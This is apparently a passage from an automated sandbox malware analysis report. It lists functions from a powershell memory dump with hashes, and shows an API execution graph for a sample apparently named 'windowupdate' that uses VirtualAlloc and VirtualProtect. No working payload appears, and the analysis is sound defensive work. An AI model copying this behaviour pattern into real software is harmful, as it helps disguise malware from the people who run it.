                      Function 00729FF0 Relevance: .0, Instructions: 43COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 616a0ce1feeaf2ab2ca8f110ccfcbb174925fb1f1d480544939de1ef2bff516e
                      • Instruction ID: 94044e7860305e59a14b69f6dc4cd14d4eb9a9f4d151d3f2fd0e0b1aeb7aa2d0
                      • Opcode Fuzzy Hash: 616a0ce1feeaf2ab2ca8f110ccfcbb174925fb1f1d480544939de1ef2bff516e
                      • Instruction Fuzzy Hash: B2F0F6757046207B9B28D6AAA850E6BF7DBEFC92A0704C03AE508CB740FA35EC0143A0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00728D27 Relevance: .0, Instructions: 41COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 120319a71513a3f74d0a83cb728d06c914fad78384f146a03a6fe423de22ad3e
                      • Instruction ID: 7ed2fd8fbbeb804ed27e35529f3a436f0895ca85973cda6bc9624b586e19a4d7
                      • Opcode Fuzzy Hash: 120319a71513a3f74d0a83cb728d06c914fad78384f146a03a6fe423de22ad3e
                      • Instruction Fuzzy Hash: 16F02B3530031457D7546929E880BBBB7DAEFD4754F14883AE6058B6C0DEB9FC0883E6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00721F58 Relevance: .0, Instructions: 41COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ac7aa099127064299905250b465ec5897978793e9dbbda99093c69d0a5cefa36
                      • Instruction ID: 2375a50cdb89db50b153663c71f964c1a5002ca347c685ddaf15c1580d91e414
                      • Opcode Fuzzy Hash: ac7aa099127064299905250b465ec5897978793e9dbbda99093c69d0a5cefa36
                      • Instruction Fuzzy Hash: F801D135B042258BCB28A764D9257BF76B2AB88304F45443DD006FB780CF785D029BE6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00725316 Relevance: .0, Instructions: 33COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c013847490f0c82f3b4824d57f3577436b488651253ee38e1bbc02824a7247bb
                      • Instruction ID: 9eec18a6481dbc7a75099f6c14a0ee792bd15f9227689f9de46d764e9786b6c5
                      • Opcode Fuzzy Hash: c013847490f0c82f3b4824d57f3577436b488651253ee38e1bbc02824a7247bb
                      • Instruction Fuzzy Hash: BAF03C71A01728DFDF94CF64E9807ADB7F2BB44354F1091AAE408A3250DB749999CB50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0072531F Relevance: .0, Instructions: 33COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c013847490f0c82f3b4824d57f3577436b488651253ee38e1bbc02824a7247bb
                      • Instruction ID: 9eec18a6481dbc7a75099f6c14a0ee792bd15f9227689f9de46d764e9786b6c5
                      • Opcode Fuzzy Hash: c013847490f0c82f3b4824d57f3577436b488651253ee38e1bbc02824a7247bb
                      • Instruction Fuzzy Hash: BAF03C71A01728DFDF94CF64E9807ADB7F2BB44354F1091AAE408A3250DB749999CB50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0072BE5B Relevance: .0, Instructions: 25COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 32038770d1f36c13d756bcaef505206c40a92088be119d840898e413391d6015
                      • Instruction ID: 3361c94130c02f360f74cb68107653f2e8e4dd28f4452e5d6ebd7742780aab31
                      • Opcode Fuzzy Hash: 32038770d1f36c13d756bcaef505206c40a92088be119d840898e413391d6015
                      • Instruction Fuzzy Hash: 80E075B650010DFF9F02DEA0CD00CEFBBBAEF48250B11C456FD1492110D6328A21AB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00724F28 Relevance: .0, Instructions: 24COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 08d7bfa040d01d456670877ff8021b267235bd160b2e7e7aa9d205ec5afb9f30
                      • Instruction ID: 0b8d544300a06330c9edee9c5001849ebc7f188a7544a58e05b2b84e378bf1fa
                      • Opcode Fuzzy Hash: 08d7bfa040d01d456670877ff8021b267235bd160b2e7e7aa9d205ec5afb9f30
                      • Instruction Fuzzy Hash: F1F0C27200014EBFDF128FA0CC01FEA3FAAEF8C305F048151FA5455061C636D530AB60
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0072B1D8 Relevance: .0, Instructions: 24COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ec2c4f02b869205760d5d54d50fe35f80fbc1dddb99c842a9adb2f22977b672c
                      • Instruction ID: b3be9a2aa1c3d8fa6e931a514e14581a0bab2faf5efbe1ea1f2526598b73fa01
                      • Opcode Fuzzy Hash: ec2c4f02b869205760d5d54d50fe35f80fbc1dddb99c842a9adb2f22977b672c
                      • Instruction Fuzzy Hash: 7AF03939700619CFCB10DF94E8848AEB3B2FB4830171088A6EA1A97212C735E855CB00
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0072BE60 Relevance: .0, Instructions: 22COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d312b515be286edb3bdbc05693921a106d8c6b5e1109146b33a1cd865083b346
                      • Instruction ID: ff07be501e8fa87b604180658577afe4846b44532f9a686b36092e7198ecaff6
                      • Opcode Fuzzy Hash: d312b515be286edb3bdbc05693921a106d8c6b5e1109146b33a1cd865083b346
                      • Instruction Fuzzy Hash: 87E092B690020DFF9F01DEA08D00CAF7BBAEB48200B00C465BA0492120E6328A31ABA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00721C5F Relevance: .0, Instructions: 18COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 15b38b40057e70923444b56012c2e438dd9913a745cf9146f839cdf63c355a1b
                      • Instruction ID: 7717154dad7460af3d2ff41299a55b7a3ee553899795fd62508d3a93a7fb3363
                      • Opcode Fuzzy Hash: 15b38b40057e70923444b56012c2e438dd9913a745cf9146f839cdf63c355a1b
                      • Instruction Fuzzy Hash: 63D05B3514C3448FC301C7A4E4158E17FB4DF4652171540CFE5444BA73C611AC51CB93
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00721C40 Relevance: .0, Instructions: 18COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cfc4d7b29cc39081a9845ec086bdbf2776f9c44d7d22d730f611f0bec01c2266
                      • Instruction ID: 301f2556078ab5be55c9434d04ddb28d72c6c6a8ce422429bca784e6e4712233
                      • Opcode Fuzzy Hash: cfc4d7b29cc39081a9845ec086bdbf2776f9c44d7d22d730f611f0bec01c2266
                      • Instruction Fuzzy Hash: 37D0C9311A8389AFD3114B65C854A30BBB8EF47A55F1500D6E645CBAB3DB36A8128B53
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00720E6E Relevance: .0, Instructions: 17COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bef2fb7dcb2adf44a9ecdb669cb50958e5582450b64950a79cdec00488a3a042
                      • Instruction ID: 7de7bdb06613046693915ecb16681c4f03b5346443ab73b01969bb6efde5c707
                      • Opcode Fuzzy Hash: bef2fb7dcb2adf44a9ecdb669cb50958e5582450b64950a79cdec00488a3a042
                      • Instruction Fuzzy Hash: D5D0C9310597548FC3025F68D814891BBF8FF0A62573691D7E5898B273C721E815CB59
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00721C70 Relevance: .0, Instructions: 8COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cb74fb31f46fd1a4a3de4a5bf07084226c9ea43e9fded3a6fa73149d36356164
                      • Instruction ID: 22192bfc1a420974a0ba8529b32e7b8d8ff0e605550863a3a87e5e74e55d65d1
                      • Opcode Fuzzy Hash: cb74fb31f46fd1a4a3de4a5bf07084226c9ea43e9fded3a6fa73149d36356164
                      • Instruction Fuzzy Hash: 9BC09238260208CFC200DB59D488C50B7ECFF49A1935580D8E50D8B732CB22FC01CA80
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00720E80 Relevance: .0, Instructions: 7COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
                      • Instruction ID: a0ccf6e4bed68dc0c69f5d0bbd707ad7c253f4111acce2a0e91a8f8d8fd4bd45
                      • Opcode Fuzzy Hash: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
                      • Instruction Fuzzy Hash: 03B092351602088F82409B68E448C00B3E8AB08A243118090E10C8B232C621F8008A40
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Execution Graph

                      Execution Coverage:1.3%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:0%
                      Total number of Nodes:328
                      Total number of Limit Nodes:14
                      execution_graph 40299 d313d0 40 API calls ~Module 40201 d47ed0 7 API calls 40203 d49cd0 6 API calls 4 library calls 40301 d499d0 12 API calls 2 library calls 40302 d5d9d0 23 API calls 4 library calls 40303 d46fda 11 API calls _memmove_s 40204 d374c0 67 API calls 2 library calls 40208 d494c0 InterlockedFlushSList ___std_type_info_destroy_list 40211 d352f0 36 API calls 2 library calls 39857 d472f0 39866 d47330 InitializeCriticalSectionAndSpinCount GetModuleHandleW 39857->39866 39859 d472f8 39877 d47f40 39859->39877 39861 d472ff 39862 d47310 39861->39862 39881 d48a40 4 API calls 2 library calls 39861->39881 39882 d48270 39862->39882 39865 d4731a 39867 d47368 39866->39867 39868 d4735a GetModuleHandleW 39866->39868 39869 d47375 GetProcAddress GetProcAddress 39867->39869 39870 d4736e 39867->39870 39868->39867 39872 d4739f 39869->39872 39873 d473b8 CreateEventW 39869->39873 39885 d48a40 4 API calls 2 library calls 39870->39885 39872->39873 39874 d473a5 39872->39874 39873->39874 39875 d473d4 39873->39875 39874->39859 39886 d48a40 4 API calls 2 library calls 39875->39886 39878 d47f58 39877->39878 39880 d47f51 pre_c_initialization ___scrt_is_ucrt_dll_in_use 39877->39880 39878->39880 39887 d48a40 4 API calls 2 library calls 39878->39887 39880->39861 39881->39862 39888 d481c0 39882->39888 39885->39869 39886->39874 39887->39880 39889 d481d4 39888->39889 39890 d481fa 39888->39890 39894 d8cb50 21 API calls _atexit 39889->39894 39895 d8cc00 21 API calls 2 library calls 39890->39895 39893 d481dd 39893->39865 39894->39893 39895->39893 40309 d4c7f0 GetLastError SetLastError TlsGetValue ___vcrt_getptd_noinit 40219 d368e0 36 API calls ~Module 40216 d3e4e0 78 API calls ~Module 40218 d312e0 63 API calls 2 library calls 40315 d3cfe0 36 API calls ~Module 40221 d446e0 37 API calls ~Module 40316 d473e0 DeleteCriticalSection CloseHandle 40318 d493e0 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 40319 d48be0 GetModuleHandleW 40320 d47de0 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter pre_c_initialization 40222 d5b4e0 RtlUnwind 40322 d33790 37 API calls ~Module 40323 d46190 36 API calls 3 library calls 40226 d9bc90 EnterCriticalSection LeaveCriticalSection 40228 d3d280 54 API calls ~Module 40327 d3df80 52 API calls ~Module 40233 d33e80 36 API calls ~Module 40325 d35180 51 API calls 2 library calls 40328 d48180 DeleteCriticalSection TlsFree ___scrt_uninitialize_crt 40235 d5c280 55 API calls _memmove_s 40239 d3ceb0 38 API calls 2 library calls 40330 d369b0 36 API calls 2 library calls 40240 d45eb0 61 API calls 2 library calls 40333 d47db0 47 API calls 2 library calls 40335 d5c3b0 56 API calls _memmove_s 40190 d8d7b0 40192 d8d7c0 40190->40192 40191 d8d7f1 40192->40191 40194 d484f0 40192->40194 40199 d48c70 SetUnhandledExceptionFilter 40194->40199 40196 d484f8 40200 d90c10 11 API calls 2 library calls 40196->40200 40198 d48503 40198->40192 40199->40196 40200->40198 40338 d313a0 64 API calls 3 library calls 40245 d46aa9 GetProcessHeap HeapFree InterlockedPushEntrySList ~Module 40340 d3cf50 38 API calls ~Module 40246 d4c850 3 API calls 3 library calls 40342 d55350 47 API calls 3 library calls 40248 d35840 36 API calls ~Module 40249 d3d840 59 API calls 3 library calls 40343 d31340 51 API calls ~Module 40345 d34740 36 API calls ~Module 39969 d48740 39976 d48b80 39969->39976 39988 d4af80 39976->39988 39979 d4874b 39980 d8d790 39979->39980 39990 d8d550 39980->39990 39982 d48756 39983 dbf790 39982->39983 40096 d3cb60 GetCommandLineA 39983->40096 39987 d4876d 39989 d48b93 GetStartupInfoW 39988->39989 39989->39979 39993 d8d710 39990->39993 39992 d8d55f 39992->39982 39996 d9fc50 39993->39996 39997 d8d71a 39996->39997 39998 d9fc67 pre_c_initialization 39996->39998 39997->39992 39998->39997 40000 d9f960 39998->40000 40009 d9fb20 40000->40009 40002 d9f977 40015 d9f410 40002->40015 40004 d9f997 pre_c_initialization 40004->39998 40005 d9f983 std::_Timevec::_Timevec pre_c_initialization __wcstombs_l 40005->40004 40021 d9fe00 40005->40021 40007 d9fa1d pre_c_initialization std::_Fac_node::_Fac_node 40007->40004 40037 d9f0f0 13 API calls pre_c_initialization 40007->40037 40010 d9fb6a 40009->40010 40011 d9fbeb 40010->40011 40038 d9b690 EnterCriticalSection 40010->40038 40011->40002 40014 d9fb7e 40039 d9fbed LeaveCriticalSection std::_Mutex::_Lock 40014->40039 40016 d9f42b 40015->40016 40017 d9f43b GetOEMCP 40016->40017 40018 d9f45d 40016->40018 40020 d9f456 __fassign 40017->40020 40019 d9f463 GetACP 40018->40019 40018->40020 40019->40020 40020->40005 40022 d9f410 pre_c_initialization 2 API calls 40021->40022 40025 d9fe1c 40022->40025 40023 d9fe28 pre_c_initialization 40051 d47280 5 API calls ___raise_securityfailure 40023->40051 40024 d9ffc6 40024->40023 40027 d9ffda IsValidCodePage 40024->40027 40025->40023 40025->40024 40026 d9fe6a pre_c_initialization 40025->40026 40034 d9f5f0 pre_c_initialization 15 API calls 40026->40034 40027->40023 40029 d9fff1 40027->40029 40031 da0082 GetCPInfo 40029->40031 40032 d9fffe 40029->40032 40030 da01fe 40030->40007 40031->40023 40035 da0098 pre_c_initialization 40031->40035 40033 d9f5f0 pre_c_initialization 15 API calls 40032->40033 40033->40023 40034->40023 40040 d9f5f0 40035->40040 40037->40004 40038->40014 40039->40011 40041 d9f615 GetCPInfo 40040->40041 40045 d9f799 40040->40045 40044 d9f631 40041->40044 40041->40045 40043 d9f955 40043->40023 40052 da5170 40044->40052 40064 d47280 5 API calls ___raise_securityfailure 40045->40064 40047 d9f725 40060 da8fb0 40047->40060 40049 d9f75f 40050 da8fb0 pre_c_initialization 8 API calls 40049->40050 40050->40045 40051->40030 40053 da5184 __fassign 40052->40053 40065 da0990 40053->40065 40055 da51d7 ___scrt_get_show_window_mode std::_Timevec::_Timevec __MarkAllocaS __wcstombs_l __fassign 40056 da0990 __fassign MultiByteToWideChar 40055->40056 40058 da51e3 std::_Mutex::_Lock __fassign 40055->40058 40057 da52c1 __fassign 40056->40057 40057->40058 40059 da52f9 GetStringTypeW 40057->40059 40058->40047 40059->40058 40061 da8fc4 __fassign 40060->40061 40070 da8bf0 40061->40070 40063 da8ff2 __fassign 40063->40049 40064->40043 40068 da08e0 40065->40068 40069 da08f5 MultiByteToWideChar 40068->40069 40069->40055 40071 da8bfe pre_c_initialization 40070->40071 40072 da0990 __fassign MultiByteToWideChar 40071->40072 40073 da8c71 std::_Timevec::_Timevec pre_c_initialization __MarkAllocaS __wcstombs_l __fassign 40072->40073 40074 da0990 __fassign MultiByteToWideChar 40073->40074 40087 da8c7d std::_Mutex::_Lock 40073->40087 40075 da8d2d __fassign 40074->40075 40075->40087 40088 d93d90 40075->40088 40078 da8d98 __fassign 40079 d93d90 pre_c_initialization 6 API calls 40078->40079 40078->40087 40079->40087 40080 da8e09 std::_Timevec::_Timevec pre_c_initialization __MarkAllocaS __wcstombs_l __fassign 40081 d93d90 pre_c_initialization 6 API calls 40080->40081 40080->40087 40082 da8ed0 40081->40082 40083 da8efd __fassign 40082->40083 40084 da8f46 __fassign 40082->40084 40082->40087 40094 da0a90 WideCharToMultiByte _wctomb_s 40083->40094 40095 da0a90 WideCharToMultiByte _wctomb_s 40084->40095 40087->40063 40089 d93270 pre_c_initialization 5 API calls 40088->40089 40090 d93d9d 40089->40090 40091 d93e10 pre_c_initialization 5 API calls 40090->40091 40093 d93da6 40090->40093 40092 d93dfd LCMapStringW 40091->40092 40092->40093 40093->40078 40093->40080 40093->40087 40094->40087 40095->40087 40097 dc1520 ~Module 35 API calls 40096->40097 40098 d3cb8b CoInitialize 40097->40098 40099 dc1520 ~Module 35 API calls 40098->40099 40100 d3cb9f 40099->40100 40147 dbf830 VirtualAlloc 40100->40147 40104 d3cd9e CoUninitialize 40105 dc1520 ~Module 35 API calls 40104->40105 40129 d3cc14 40105->40129 40107 d3cbf7 40175 d3d190 78 API calls ~Module 40107->40175 40108 d3cc72 40108->40104 40117 d3cca7 40108->40117 40180 d47950 RaiseException EnterCriticalSection LeaveCriticalSection new Concurrency::cancel_current_task 40108->40180 40109 d3ccaf 40113 d3ccbb 40109->40113 40114 d3ccc3 40109->40114 40111 d34020 41 API calls 40116 d3cbd2 40111->40116 40181 dc1350 35 API calls ~Module 40113->40181 40182 d3dd40 87 API calls ~Module 40114->40182 40115 d3cc03 40115->40129 40176 d3d130 35 API calls ~Module 40115->40176 40116->40107 40116->40108 40116->40111 40118 d3cc33 40116->40118 40179 d33f80 38 API calls ~Module 40116->40179 40117->40108 40177 d3d160 35 API calls ~Module 40118->40177 40119 d3cdbf 40122 dc1520 ~Module 35 API calls 40119->40122 40127 d3cdcd 40122->40127 40126 d3cc3b 40126->40129 40178 d3d200 80 API calls ~Module 40126->40178 40142 dc1520 40127->40142 40128 d3cced 40183 d3c410 37 API calls ~Module 40128->40183 40186 dc14c0 35 API calls _RTC_StackFailure 40129->40186 40132 d3ccfd 40184 d3cf20 36 API calls ~Module 40132->40184 40134 d3cd35 40135 d3cd64 GetMessageA 40134->40135 40136 dc1520 ~Module 35 API calls 40135->40136 40137 d3cd7d 40136->40137 40138 d3cd81 DispatchMessageA 40137->40138 40139 d3cd96 40137->40139 40140 dc1520 ~Module 35 API calls 40138->40140 40185 d3cef0 36 API calls ~Module 40139->40185 40140->40134 40143 dc1522 40142->40143 40144 dc1523 40142->40144 40143->39987 40189 dc16d0 35 API calls failwithmessage 40144->40189 40146 dc1539 40146->39987 40148 dc1520 ~Module 35 API calls 40147->40148 40149 dbfa12 VirtualProtect 40148->40149 40150 dc1520 ~Module 35 API calls 40149->40150 40164 dbfa51 40150->40164 40151 dbfbad MessageBoxA 40155 dc1520 ~Module 35 API calls 40151->40155 40152 dbfcda 40159 dc1520 ~Module 35 API calls 40152->40159 40153 dbfc52 MessageBoxA 40154 dc1520 ~Module 35 API calls 40153->40154 40156 dbfc6f MessageBoxA 40154->40156 40155->40164 40160 dc1520 ~Module 35 API calls 40156->40160 40158 dbfbdc MessageBoxA 40161 dc1520 ~Module 35 API calls 40158->40161 40162 dbfd73 40159->40162 40163 dbfc25 40160->40163 40161->40164 40165 dbfd7c Sleep 40162->40165 40166 dbfd92 40162->40166 40163->40152 40163->40153 40164->40151 40164->40158 40164->40163 40167 dc1520 ~Module 35 API calls 40165->40167 40187 dc14c0 35 API calls _RTC_StackFailure 40166->40187 40167->40162 40169 dbfda1 40188 d47280 5 API calls ___raise_securityfailure 40169->40188 40171 dbfdaf 40172 dc1520 ~Module 35 API calls 40171->40172 40173 d3cbc5 40172->40173 40174 d33f80 38 API calls ~Module 40173->40174 40174->40116 40175->40115 40176->40129 40177->40126 40178->40129 40179->40116 40180->40109 40181->40114 40182->40128 40183->40132 40184->40134 40185->40104 40186->40119 40187->40169 40188->40171 40189->40146 40347 d55b40 14 API calls 5 library calls 40256 d33a70 38 API calls ~Module 40349 d3d570 65 API calls ~Module 40350 d36970 36 API calls ~Module 40257 d4c270 17 API calls 7 library calls 40351 d44770 45 API calls 3 library calls 40352 d49b70 7 API calls CatchGuardHandler 40353 d5cd70 23 API calls 4 library calls 40262 d36860 36 API calls ~Module 40355 d31360 35 API calls ~Module 40356 d3f760 56 API calls 2 library calls 40264 d44660 37 API calls ~Module 40358 d45360 87 API calls 3 library calls 40266 d5b663 14 API calls DName::DName 40267 d47410 4 API calls 2 library calls 40362 d87d0a LeaveCriticalSection std::_Mutex::_Lock 40272 d31000 47 API calls ~Module 40364 d3d300 40 API calls ~Module 40276 d4e400 5 API calls DName::DName 40279 d96400 GetLastError 40282 d3c830 90 API calls 2 library calls 39896 d48430 39897 d48438 pre_c_initialization 39896->39897 39918 d487b0 39897->39918 39899 d4843d pre_c_initialization 39900 d47f40 pre_c_initialization 4 API calls 39899->39900 39901 d48449 39900->39901 39902 d4845a __RTC_Initialize 39901->39902 39936 d48a40 4 API calls 2 library calls 39901->39936 39904 d48270 _atexit 21 API calls 39902->39904 39905 d4846b 39904->39905 39922 d47c20 39905->39922 39908 d4847e 39926 d494b0 InitializeSListHead 39908->39926 39911 d48483 pre_c_initialization ___scrt_is_user_matherr_present 39927 d494f0 39911->39927 39913 d484a8 pre_c_initialization 39932 d8f020 39913->39932 39915 d484b3 pre_c_initialization 39916 d484dc 39915->39916 39938 d48a40 4 API calls 2 library calls 39915->39938 39919 d487b8 pre_c_initialization 39918->39919 39939 d8d940 39919->39939 39921 d487be 39921->39899 39923 d47c28 pre_c_initialization 39922->39923 39944 d8b950 39923->39944 39926->39911 39962 d90cc0 39927->39962 39929 d49504 39930 d49512 39929->39930 39966 d48a40 4 API calls 2 library calls 39929->39966 39930->39913 39934 d8f02d 39932->39934 39933 d8f069 39933->39915 39934->39933 39968 d82900 11 API calls 2 library calls 39934->39968 39936->39902 39937 d48a40 4 API calls 2 library calls 39937->39908 39938->39916 39940 d8d952 39939->39940 39942 d8d9cc pre_c_initialization 39940->39942 39943 d82900 11 API calls 2 library calls 39940->39943 39942->39921 39943->39942 39947 d8a760 39944->39947 39946 d47c2e 39946->39908 39946->39937 39952 d8a776 39947->39952 39955 d8a76f std::_Timevec::_Timevec pre_c_initialization 39947->39955 39948 d8a7ca 39958 d82900 11 API calls 2 library calls 39948->39958 39949 d8a7fd 39959 d8b670 27 API calls pre_c_initialization 39949->39959 39951 d8a804 39960 d8aca0 15 API calls pre_c_initialization 39951->39960 39952->39948 39952->39949 39955->39946 39956 d8a827 std::_Timevec::_Timevec pre_c_initialization 39956->39955 39961 d8b690 35 API calls pre_c_initialization 39956->39961 39958->39955 39959->39951 39960->39956 39961->39955 39963 d90ce5 __initialize_default_precision 39962->39963 39964 d90d68 __initialize_default_precision 39962->39964 39963->39964 39967 d82900 11 API calls 2 library calls 39963->39967 39964->39929 39966->39930 39967->39964 39968->39933 40284 d42030 88 API calls 3 library calls 40285 d48230 21 API calls _atexit 40288 d47e30 11 API calls 40293 d36820 36 API calls ~Module 40294 d41020 37 API calls 2 library calls 40296 d47820 5 API calls ___raise_securityfailure 40373 d47b20 GetLastError SetLastError TlsGetValue TlsSetValue _unexpected 40297 d5b220 LoadLibraryExW GetLastError LoadLibraryExW _wcsncmp 40374 d8a120 EnterCriticalSection std::_Mutex::_Lock 40375 d46f2c 55 API calls

                      Executed Functions

                      Function 00D48C70 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 468 d48c70-d48c7f SetUnhandledExceptionFilter
                      C-Code - Quality: 100%
                      			E00D48C70() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00D48C90); // executed
				return _t1;
			}




                      0x00d48c78
                      0x00d48c7f

                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(00D48C90,?,00D484F8), ref: 00D48C78
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: 1ed0977071c75beb034760e5be8a6aeb068f874174559e26067bb989131f366a
                      • Instruction ID: 5d52e1a469870276197a60cfecfad1a2793e1b2390b74a1f67df1a9f66e3e4bf
                      • Opcode Fuzzy Hash: 1ed0977071c75beb034760e5be8a6aeb068f874174559e26067bb989131f366a
                      • Instruction Fuzzy Hash: BAA0223008030EBF0A0033C2BC0AC0C3B0CE008AA33080080F20C802028E82A00000B2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00DBF830 Relevance: 77.3, APIs: 8, Strings: 36, Instructions: 344windowmemorysleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      C-Code - Quality: 80%
                      			E00DBF830(void* __ebx, void* __edi, void* __esi) {
